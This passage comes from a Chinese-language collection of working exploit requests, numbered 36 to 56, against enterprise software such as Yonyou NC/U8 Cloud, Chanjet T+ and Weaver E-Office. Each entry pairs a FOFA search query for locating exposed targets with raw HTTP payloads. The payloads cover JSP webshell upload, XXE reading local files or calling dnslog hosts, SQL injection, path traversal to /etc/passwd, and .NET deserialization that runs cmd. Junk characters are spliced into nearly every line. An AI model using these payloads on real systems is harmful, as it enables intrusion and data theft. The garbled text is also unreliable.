& u1 v3 E, s' T- g: kPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.16 I) Y( f: f6 _5 X9 f4 N% ]5 }
Host: 203.25.218.166:8888* q7 G8 M' r# q4 M$ b# `
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info z3 s. p0 H( F$ w, Q' g0 N5 A
Accept-Encoding: gzip, deflate% ~# ^5 r" H7 g! W, t& l4 d1 w h8 x6 D5 l
Accept: */*
# V2 c9 v! Q" t6 wConnection: close
/ [ g# f7 @) c7 h5 \& O( i. LaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
: |! R& j3 m$ E) S1 U+ x& OContent-Length: 190
# ?& x: h/ G$ G2 i7 \2 ^Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0- P' p1 @8 t# X) E, w) _* W
; O* f$ N: O* p, @, g8 J' h6 t
--fd28cb44e829ed1c197ec3bc71748df0. Y8 `5 d+ U T- I6 n2 R
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"& C w3 K3 b. X5 X; B- s& C- \0 }
' ^3 a% f/ K1 d/ u<%out.println(1111*1111);%>) e7 z# _9 ~- r- J! {# z g
--fd28cb44e829ed1c197ec3bc71748df0--
- I$ g4 g2 @6 W, K% z$ Y* D8 [+ N7 I3 s7 Q% H, z
/ W- j) s; _! ^+ l. D. S36. 用友NC-Cloud soapFormat XXE
. x4 K/ y( D( L# ]6 D2 v. pFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"+ _( G2 Z5 {6 _" L9 F0 b7 q
POST /uapws/soapFormat.ajax HTTP/1.1
# L. j5 F9 `, Y3 y8 d# ]Host: 192.168.40.130:8989+ B# @; K4 [& c1 \! ]* A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
1 K, k! V4 R4 u: `7 z! b7 K s2 O5 k9 ZContent-Length: 263
( F! ?0 O1 i9 M' B5 w6 E# s* tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- R, G, X/ h+ e2 ~, H% x$ v
Accept-Encoding: gzip, deflate. h# I4 W8 G: q7 l2 j3 R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 W7 d; \8 N4 o5 d/ s7 X9 U4 EConnection: close# R# `! V% a" |" d5 X: y
Content-Type: application/x-www-form-urlencoded$ M- @/ L( P" ?4 U& s1 n7 f
Upgrade-Insecure-Requests: 1$ F# a/ {5 s2 |: ^9 P
g* ]5 @1 Z1 J' S9 k Bmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
8 ? @- F ?4 z3 {1 a
# P# y! g5 P3 l0 L0 g
% c4 }8 V& U M- J) A+ A0 {/ `6 ^37. 用友NC-Cloud IUpdateService XXE
) ^5 X1 J1 \3 ]3 Z, H- ~FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
* o" X: y$ y; J! c$ i. l0 GPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1! [* c, D" q; J+ h
Host: 192.168.40.130:8989
# M$ G9 f+ u4 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
! k' B, @$ X7 d1 V1 l% e" [Content-Length: 421
6 F+ C G. B5 J3 K E" @7 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9+ d3 r$ |% q* r+ x& z6 h
Accept-Encoding: gzip, deflate8 c6 J$ {" {: S
Accept-Language: zh-CN,zh;q=0.94 M/ x! }2 v) x: Q/ v/ g- r) c, W
Connection: close
$ F) ?- R, n$ V8 S2 r: c1 o8 CContent-Type: text/xml;charset=UTF-8
" c/ @5 k: |; J$ U, c- \2 {SOAPAction: urn:getResult$ {, o. B" B6 e0 S; W- t
Upgrade-Insecure-Requests: 1, S- d w* T) a2 G( q/ q! a, O
2 A8 ?5 M6 r/ y. [8 C8 |& N# E# w<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
4 ^7 G! x4 F. U! {2 O7 F<soapenv:Header/>( l% c" k" s$ ^! r$ u
<soapenv:Body>! ^" @5 z. h6 X; V$ k* s6 S3 i
<iup:getResult>6 x: @% a8 f( j4 I2 n8 D
<!--type: string-->
4 L2 a# B9 N$ ^<iup:string><![CDATA[# w e8 r' i- `% F1 N
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>8 _) g; |1 E) w8 t* h5 n5 T- x
<xxx/>]]></iup:string>% ~. Q# Q4 C9 N
</iup:getResult>1 i2 M- y0 @' u$ G5 C# }# A
</soapenv:Body>
1 L& P S' ?5 X( i9 X4 d, _% h, S</soapenv:Envelope>/ J; b/ t; ?3 H/ z% J7 i0 b
5 E2 z' w+ Q& }, d7 D% t, c% E. `" @; K; L1 P
( o! y) R7 m/ V4 ~/ c# V
38. 用友U8 Cloud smartweb2.RPC.d XXE# k* ^( L" b- s0 D$ m/ r
FOFA:app="用友-U8-Cloud"1 t: W7 ^+ Z4 D$ |0 E% t; C% s
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1* j# w+ F9 B& U7 C$ d1 Q" k
Host: 192.168.40.131:8088
6 ~( c3 l: s3 ]% T7 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
, n s9 g u. lContent-Length: 260
- H( m# W6 X( [9 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b37 `; I4 I4 V) h: Z0 p/ B1 B
Accept-Encoding: gzip, deflate5 \( V1 @; B: y) Q7 {$ H
Accept-Language: zh-CN,zh;q=0.9* I: B9 g& C9 D, W
Connection: close7 Q- E$ t9 |- @- T: D
Content-Type: application/x-www-form-urlencoded
! l+ b1 ^0 @. t/ R8 f U4 j( [) K" F. s: ` V( ?- q& `
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
. s S( M7 w2 Q3 h; B# s" ^
% |# X+ J3 J/ w1 i1 s, a0 I. A6 r2 f( \5 U ~. a
39. 用友U8 Cloud RegisterServlet SQL注入9 ?% B+ w$ W2 y. C8 Z: E
FOFA:title="u8c": C6 n$ L7 }4 P7 a& r. W
POST /servlet/RegisterServlet HTTP/1.1
+ ] I/ `- F( k" Q% t _Host: 192.168.86.128:8089
: i4 f& l9 f" p7 {* pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
) T1 T. V; I. _& sConnection: close
# p! ~+ P5 k9 @% x* r4 PContent-Length: 85
! Z( Y8 w! Y9 k d, v3 ~3 i/ aAccept: */*
/ i( J# U4 W8 }) xAccept-Language: en' h, q8 m+ I3 ~/ \) h" T. c2 t
Content-Type: application/x-www-form-urlencoded
: }6 d0 F h5 R4 a, ?& vX-Forwarded-For: 127.0.0.1& r2 I! U+ \5 T \$ |( z
Accept-Encoding: gzip
5 `& c) D8 j* ?! c1 A+ S, ~6 ]# i5 ?: ? G
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
- G- l& V7 A) z/ s
" o, o. r9 h& R
/ I) {$ W0 M" q; }, v9 e7 o" e2 _40. 用友U8-Cloud XChangeServlet XXE: X: C. B$ U5 x, S" \' U, Q- T' W
FOFA:app="用友-U8-Cloud"# S& F/ ~8 q* F+ Y6 K6 H5 o
POST /service/XChangeServlet HTTP/1.1
4 [; e' |/ B' w: T0 UHost: x.x.x.x' X) e& u5 z5 _8 G. n% i
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36* _& z# r {0 B& ?3 p
Content-Type: text/xml; S% b" e; `# S* C
Connection: close
! L; u) l9 b: T
+ F/ B1 Y ?+ }; ^<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
1 e& A4 d/ t5 G6 F
6 o( p" z) [1 Y0 { S/ A$ @( w6 S( |9 C% n+ v0 z. u* `8 O
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
' l# z5 n0 _9 N4 W; u7 x% JFOFA:app="用友-U8-Cloud"! c T/ f: U1 H/ ?# a1 ]) R4 `! Q
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1+ ~% z8 F0 r% w4 k
Host:6 `. x* D! N, @7 E( n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 `+ _9 o' c) T- K% ~Content-Type: application/json
+ C+ X& _6 h1 o' }Accept-Encoding: gzip
8 s7 X7 ~8 Q* N' c- y' CConnection: close+ E- N5 {8 c8 ~3 b F
0 j) @1 a0 K, V5 t) ] c
. L6 o" U1 v2 p# n# A42. 用友GRP-U8 SmartUpload01 文件上传
- O& N: g/ \- A( E' U6 S D" {! gFOFA:app="用友-GRP-U8"
" o7 B; h' X" @" I: t+ e& HPOST /u8qx/SmartUpload01.jsp HTTP/1.1. _6 k% Y7 {7 F3 |. I
Host: x.x.x.x* L7 }0 e% v6 Y; u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
$ ^8 p% [ ~, U- e1 W) ~# C* kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
3 Z' ]' |* U4 Y" w3 ^5 X6 E$ ?& `! I- d9 m# R. r
PAYLOAD
( l) K8 @4 p' j+ ?! R& c
+ E4 W2 P6 ]+ i6 g9 g6 R
1 x# x; X$ B5 l. z( n6 Chttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml6 H u" F* i! o' i/ ?7 O9 t
7 |3 d5 E8 \4 J7 L8 X& b43. 用友GRP-U8 userInfoWeb SQL注入致RCE
# J6 w8 R# n, X1 @; JFOFA:app="用友-GRP-U8"
8 O" `6 i) }+ X' J! ePOST /services/userInfoWeb HTTP/1.1
) g! G$ V. \2 N/ N. pHost: your-ip
$ w1 k+ i$ }) E4 Z( [8 l' iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36, [9 d! P& Z# F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 r; K( C1 E) D+ hAccept-Encoding: gzip, deflate
1 l% U! s1 r: Q' xAccept-Language: zh-CN,zh;q=0.9
. h/ t' B6 n/ w# R; FConnection: close
: S% K* B6 B6 G% TSOAPAction:9 y0 l9 m* W' D5 h7 V% A& C
Content-Type: text/xml;charset=UTF-88 B. y8 r2 p3 K8 w
( X! Q8 f0 p I w<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
0 G7 K% p* }; A! J' e <soapenv:Header/>& l9 \8 v: W; g& ]. S
<soapenv:Body>7 [& {" ^4 w9 v' F; |2 b
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
8 S, q/ u% x/ e& O% W p; K, i2 b <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
5 E) ?1 g0 ] p4 Q; Z$ j </ser:getUserNameById>/ J6 e1 w3 u/ M
</soapenv:Body>
1 c. Z( F8 ]5 N# O4 p</soapenv:Envelope>
; r: b) q j& i* }) `8 W2 V: \7 U- D# ^+ n* |2 t, ]: D7 D4 r
4 n. Z6 @9 T( _44. 用友GRP-U8 bx_dj_check.jsp SQL注入
& |; u! d6 O0 Q) wFOFA:app="用友-GRP-U8"
2 c; e) O8 M, d9 X9 W* LGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1 t8 _7 G* t9 Y& f% z: s
Host: your-ip
2 G9 s; d: d" `3 z$ ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
* T$ [/ P# P0 ~7 { ?' jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ z3 M2 P2 t4 K# pAccept-Encoding: gzip, deflate
3 g6 F7 i1 }7 @8 DAccept-Language: zh-CN,zh;q=0.9* z. g. I8 A/ D: n# h1 Y+ i
Connection: close" C7 i4 A1 Q0 [+ l: ~
( F# c% K3 y( g: v% ]2 M/ Z; u/ n3 k: q* ]8 ^: a3 p
45. 用友GRP-U8 ufgovbank XXE
_ |1 x/ k% h0 ?2 C1 c K3 ?FOFA:app="用友-GRP-U8"
3 _6 p3 d& V# F5 l% XPOST /ufgovbank HTTP/1.1
2 `7 o9 }/ ~) Q# x% b0 R1 xHost: 192.168.40.130:222
5 @1 c! J2 ?, Y& G! b" q* I" ^* oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
. C7 t4 @! I- U1 u: eConnection: close$ h) f& ?3 H: F' a% Z5 g5 a- v
Content-Length: 161' W6 |8 w; I6 P3 e7 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 I% P9 k+ c8 S1 l0 @, R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! b$ V* e/ g& t0 H1 @
Content-Type: application/x-www-form-urlencoded0 H2 D& W: ^, Y) Q1 H
Accept-Encoding: gzip
9 D6 A3 O7 t( Q) m/ Y; c/ j/ }( h q5 F, v) L
reqData=<?xml version="1.0"?>
( D! D$ @4 q$ x7 y7 u) o4 l. t" i<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
4 ^7 Q+ k3 i. T8 v7 M z* C
/ L6 N: W6 [& L0 z
6 m" b# q. L0 C8 |6 n46. 用友GRP-U8 sqcxIndex.jsp SQL注入
% c8 Q! v. T% P+ Q, k$ z( g7 ]FOFA:app="用友-GRP-U8"
9 s7 X( s+ P% V3 A) A7 p* tGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
! K8 K0 e2 E- v* l" k( o6 ~Host: your-ip
6 d5 `) F3 E; A" }9 g& U3 M" IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
$ ~$ E6 P, ]# V3 A" \% w+ kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! N7 }) p: T6 j
Accept-Encoding: gzip, deflate
! ^, x$ z7 u, ZAccept-Language: zh-CN,zh;q=0.9
9 O% \( L3 V8 o0 Q; aConnection: close
1 S; w) _" B4 c# J1 {
3 U: Z$ P! K( _) i$ B) T5 C
" x6 Z$ p, W$ l# e: K47. 用友GRP A++Cloud 政府财务云 任意文件读取* d F7 N3 i. v
FOFA:body="/pf/portal/login/css/fonts/style.css"
+ d% k3 {" F% t$ y* AGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.19 Y: V6 {1 P0 K! _0 ]8 D
Host: x.x.x.x4 G3 e& u& e/ ^) {3 [2 x5 W
Cache-Control: max-age=0% O" w7 L. m1 m6 _1 V
Upgrade-Insecure-Requests: 16 }0 j. i7 ?+ n; d% }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36+ u8 b2 S% }# u1 J/ M) y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, \& d, j3 s6 @8 s/ n* z8 F. yAccept-Encoding: gzip, deflate, br
, s+ a7 H# _: s5 Q: i( k; bAccept-Language: zh-CN,zh;q=0.9) F7 f3 G3 U+ y" W1 m' U% X
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT- e7 x1 d9 F) Y2 G! ~
Connection: close: N$ P4 p9 D& x5 v
- i; ]* C, i& Y/ c8 m# t1 L z2 L0 i `6 D
3 q: P0 g0 t- {$ E% f* P48. 用友U8 CRM swfupload 任意文件上传
" e F) e& X& s- b8 {- LFOFA:title="用友U8CRM"+ I r" \ C; y1 k! v' M" a
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1- z2 ~3 a' S# N7 d& F
Host: your-ip
/ b- Y9 |- `- {/ N) Q9 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
8 j' H3 m L, s% p1 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( h) ^3 f9 p) d3 d2 o# }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 P9 r$ n! p( A- I0 m5 j4 j: A- [
Accept-Encoding: gzip, deflate+ `9 x. i$ b, n
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855: _8 [3 L5 a2 \9 q
------269520967239406871642430066855% E: D3 W: L" o8 X# y! H
Content-Disposition: form-data; name="file"; filename="s.php"
, i" d2 m! [8 X& h: u4 o! `1 z1231/ P! j% R R8 F4 q
Content-Type: application/octet-stream3 u' z3 T& X- h7 T/ z
------269520967239406871642430066855* h- O2 G& R. |2 f* X" a
Content-Disposition: form-data; name="upload"4 f4 d8 ^& q9 _) j5 V
upload% F) e9 T6 h( l/ [' N5 [! k0 Q
------269520967239406871642430066855--3 t5 r/ h; c! N$ w6 A
7 S2 t4 b" K9 ^, Q% c
$ ?! g3 }! d, W0 T) }
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
# Y Q$ J& x% I7 o9 |FOFA:body="用友U8CRM"
# e6 [- A% d a; g3 Q0 t( C
1 ]7 W3 D( {" F- a8 MPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
$ H: G. d6 T! A2 bHost: x.x.x.x7 Z: S+ F& v# C2 I, x+ K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.04 j& L% n' b( R
Content-Length: 329
% _: S; p- o& l y' AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) ~$ B( [4 u2 hAccept-Encoding: gzip, deflate8 e6 T% _* R% }4 X- D' ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 ^. i" ]# g/ U8 n( RConnection: close- z0 \3 b$ W0 F
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w8 w9 n/ J, z. K( H" |
& M3 J) R) B; _0 |+ I, p
-----------------------------vvv3wdayqv3yppdxvn3w
6 J% w# t8 S% w+ E9 u! }& F& |Content-Disposition: form-data; name="file"; filename="%s.php "- p$ b# K% e* D, u' {
Content-Type: application/octet-stream
: n% ~# I6 i8 x, k3 a3 Y. I
5 d [7 w+ g0 pwersqqmlumloqa! F1 k a( R6 h; b
-----------------------------vvv3wdayqv3yppdxvn3w
5 D3 ~7 K7 H0 g9 ^% H4 R( E8 ^* r# V9 ZContent-Disposition: form-data; name="upload") n* y3 Z1 a. j3 @9 A+ T% A
+ K0 V. q7 k. j9 \3 u% G$ Q1 Eupload
1 S' h- i8 ] a! D) \9 K-----------------------------vvv3wdayqv3yppdxvn3w--
# J( [' }4 f% R0 k4 C
( Z& b# [' A; _* Z5 {7 E6 Q
6 o$ p# O/ d6 y9 |http://x.x.x.x/tmpfile/updB3CB.tmp.php* H6 E) n& ^9 N) q4 D
% {0 T) _- c6 |$ }, [3 k0 d# Q
50. QDocs Smart School 6.4.1 filterRecords SQL注入6 \( T) U% T S) J1 W7 I
FOFA:body="close closebtnmodal"
4 B" [( U( c$ Z" O* l' H6 ]: {POST /course/filterRecords/ HTTP/1.14 u3 ^" k$ X) o2 ]/ `9 f2 y
Host: x.x.x.x# ^5 R2 y2 c5 _ e' i, L
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 P; A! P( A$ O U+ @; A
Connection: close! R! j. _/ B- ]/ D1 O% b
Content-Length: 224
" Y1 Z. M6 g) \9 h5 k, r* ?& pAccept: */*5 x% h# [- c$ L
Accept-Language: en7 S2 ]" o- p5 g9 l f! |
Content-Type: application/x-www-form-urlencoded
+ i% x: p( X7 c4 N; h5 |Accept-Encoding: gzip
7 j6 e# ^' Z8 e9 }3 u
4 i! ~; n; S% S/ z1 Z bsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
8 | H. b) b4 z3 Y" l
1 y+ e* T) x( `2 g) P; g% j$ ~; Q& }) H
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入% C4 l4 F W) }, O
FOFA:app="云时空社会化商业ERP系统"& I5 p7 a4 _/ T% x8 N9 p. c2 F
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
2 \/ w1 V7 K7 c5 J* l4 T, t& eHost: your-ip6 O. U$ z U2 I+ q6 T, O& ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
2 G6 q2 b) v5 @! w. K$ A$ Y) m4 K. ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7 s' M" K0 \' k- C1 NAccept-Encoding: gzip, deflate
( f- I$ b4 l' Q- |8 YAccept-Language: zh-CN,zh;q=0.9; U1 y' ^) z2 v- ?9 r* f0 D
Connection: close4 |$ J0 ^8 ^4 \
) ?+ r7 V( N& ]3 m% j3 R0 Z: a5 R, |& s! t1 G$ l4 h; o# v* l
52. 泛微E-Office json_common.php sql注入
- K$ r* D! P: E! F PFOFA:app="泛微-EOffice"; R" u# l0 p( g( }! \1 ?/ ?# o
POST /building/json_common.php HTTP/1.1
* }3 G- R6 L) q8 iHost: 192.168.86.128:8097
( c+ y5 r' R& nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: w+ t# R( B0 nConnection: close; ?' l, _/ @/ T7 p) X6 u. M1 i5 `! m
Content-Length: 878 D) c* e4 z6 T" W# Z
Accept: */*
. ]7 \* k+ k" E( s7 TAccept-Language: en
7 }: {$ T5 ]' N1 @" l' a) t0 RContent-Type: application/x-www-form-urlencoded+ R$ O$ A+ {) Q3 c
Accept-Encoding: gzip
3 r0 t* A* P. ^. C5 C
5 r t. S0 h( Rtfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333; y1 O+ _4 N4 W6 N+ i% O! g
+ ]6 y# j! B1 c; M7 M4 n
; @ r7 ]! t, c
53. 迪普 DPTech VPN Service 任意文件上传: G3 f( E0 j, n* s2 o* N
FOFA:app="DPtech-SSLVPN"$ g/ u! K# v9 X
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
5 I% @+ c# C! R( |6 a+ n% Y. i) ^
: T8 f/ w4 H: C! P( M5 z) i4 n7 Q( i, K5 u# G' X; t/ N
54. 畅捷通T+ getstorewarehousebystore 远程代码执行! l! H f! g$ z7 X( Z2 _- x x
FOFA:app="畅捷通-TPlus"
: w. \2 }: I9 |5 u8 B第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
. [1 {- Z, R) `6 A& N"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"4 O- w0 g* h2 x/ B) J+ ` N
. h$ E. z4 @2 w) c" E2 @# q! Y' b: d' h% S6 K! u7 B- K% p
完整数据包) X/ S5 ~# p( a! a, m& O
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1: \: i4 w7 P: N2 `5 M
Host: x.x.x.x! m5 W/ v( A" g* B
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F# N, g7 T* |4 o) \: W
Content-Length: 5935 }; H$ w0 c4 z
. o& x* P- S w9 T
{2 R* ^. b8 m# Z$ _0 j- d
"storeID":{/ e9 ~. _' m E3 `
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
. x3 g6 S- C, n "MethodName":"Start",+ n7 s: I: O. s
"ObjectInstance":{
4 [, U& p n% C( v( ^- s "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
; x S" B! U. K% A! R "StartInfo":{! w. h, Y8 t6 L9 ^4 X: r& b( k
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
; x+ l0 E$ V% V% M! R2 U "FileName":"cmd",; _& V+ m, T1 h" U) k( Q
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"7 H5 w h1 o ]; }6 ]4 ?
}% ]9 B5 v- N7 T' V H% P
}2 d- r; y/ `" L) K
}8 |. h% R0 T ?+ X' B6 ?( ]7 I& {
}' h: r4 L% l- V: M+ z/ m
k0 z, i; n8 W5 f/ A- F4 n; Z0 ~/ f% S; N5 q& J( W3 Y, k' L$ G+ s, x
第二步,访问如下url$ o: K5 `- v2 U& I
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt' e J7 _6 `" h+ ^
- R$ Y) V3 E' r
. U- p6 o' a# m' Q( n55. 畅捷通T+ getdecallusers信息泄露! P Q Z) d5 x5 M0 I( @$ R
FOFA:app="畅捷通-TPlus"
1 r1 ?! Q1 G" ?2 m6 G第一步,通过
& q$ J# j" }) p {/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
6 { G r, t; d; M( M第二步,利用获取到的Cookie请求
. t/ B3 e+ o: L/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers: h, u/ M) U! w( Z
, c8 [( g, B/ q
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
7 _& K9 w. p$ n( F% Z7 c8 G1 w& n; @FOFA: app="畅捷通-TPlus"
* S' l: g. q. B3 ~. XPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
8 W& I" X' c8 E9 c% @3 gHost: x.x.x.x5 Y- M- `$ x. ~ n
